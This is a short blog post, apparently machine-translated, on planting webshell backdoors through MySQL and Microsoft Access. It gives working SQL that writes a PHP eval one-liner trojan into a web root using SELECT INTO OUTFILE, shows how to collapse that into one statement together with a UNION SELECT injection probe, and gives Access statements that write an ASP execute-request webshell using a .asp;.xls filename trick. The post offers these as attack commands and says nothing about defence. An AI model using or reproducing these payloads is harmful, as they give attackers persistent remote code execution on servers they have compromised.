Mysql/access export a sentence take Webshell back door command

Mysql:

Drop TABLE IF EXISTS temp; Delete if temp is present
Create TABLE Temp (cmd text not NULL); Create a temp table with a CMD field inside it
Insert into temp (cmd) VALUES (<? PHP eval ($_post[cmd));? >); Insert a word trojan into the temp table
Select cmd from temp to out file f:/wwwroot/eval.php; Query a sentence in the Temp table and import the results into eval.php
Drop TABLE IF EXISTS temp; Remove temp (Wipe butt O (∩_∩) o ...)

The SQL is simple, I made a simple comment.
But consider that we often use the following statements when testing the SQL vulnerability of PHP:

/**/union SELECT 1,2,3,4,5,6,7,8,9,10,11,12/*

Then the returned page may appear with a number between 1~12. The addition of the number 3 is shown here.
If we change the above sentence to/**/union SELECT 1,2,zerosoul,4,5,6,7,8,9,10,11,12/*, the Zerosoul will be displayed where the page last displayed 3.
That is, if our SELECT statement is not followed by a from table statement, we say that the queried number or character is returned directly to the query results.

In that case, why do we have to be so troublesome to build a table, import data First, and then export such a toss.

With this idea, the above large paragraph to a sentence of the SQL code can be directly simplified to a sentence:

Select <? PHP eval ($_post[cmd]);? > into outfile f:/wwwroot/eval.php;

This is not only straightforward, but also avoids the accidental deletion of other people's data.

ACCESS:

Create table cmd (a varchar (50))
Insert into cmd (a) VALUES (' <%execute request ("s")%> ')
SELECT * into [a] in ' E:\wz\ysnews1\a.asp;. XLS ' Excel 4.0; ' from cmd
drop table cmd

This article is from the "Tree's blog" blog, please be sure to keep this source http://shuzi.blog.51cto.com/3685900/1594053

Mysql/access export a sentence take Webshell back door command